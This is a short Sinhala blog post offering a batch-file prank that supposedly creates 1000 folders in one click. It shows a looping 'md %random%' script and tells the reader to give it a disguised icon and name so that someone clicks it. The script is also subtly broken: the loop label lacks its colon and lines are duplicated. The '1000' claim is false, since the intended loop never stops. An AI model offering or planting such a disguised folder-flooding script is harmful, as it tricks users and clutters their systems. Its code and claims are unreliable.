එක ක්ලික් එකෙන් ෆෝල්ඩර් 1000ක් හදමු
ක්ලික් කරපු ගමන් ෆෝල්ඩර් 1000ක් හැදෙන්න පොඩි කෝඩ් එකක් ගැනයි මේ කියන්නෙ. පහල කෝඩ් එක නෝට්පෑඩ් එකක ලියගෙන සේවු කරගන්න.
ඊලගට මේක කැමති නමකින් සේවු කරගන්න .bat විදියට
ක්ලික් කරපු ගමන් ෆෝල්ඩර් 1000ක් හැදෙන්න පොඩි කෝඩ් එකක් ගැනයි මේ කියන්නෙ. පහල කෝඩ් එක නෝට්පෑඩ් එකක ලියගෙන සේවු කරගන්න.
@echo off
top
md %random%
goto top
md %random%
goto top
ඊලගට මේක කැමති නමකින් සේවු කරගන්න .bat විදියට
පහල ආකරයේ අයිකොන් එකක් හම්බෙයි.
මෙකේ Shortcut එකක් හදන්න Desktop එකට
ඊලගට මෙ ෆයිල් එකෙ Properties ගන්න
Change Icon වලට ගිහින් කැමති එකකට මාරු කරන්න
නමත් මරු කරන්න.
හරි, මේ වගෙ එකක් දැක්කාම ක්ලික් කරපු ගමන් එක පාරින් ෆෝල්ඩර් 1000ක් හැදෙනවා නියම ෆන් එක..
0 comments:
Post a Comment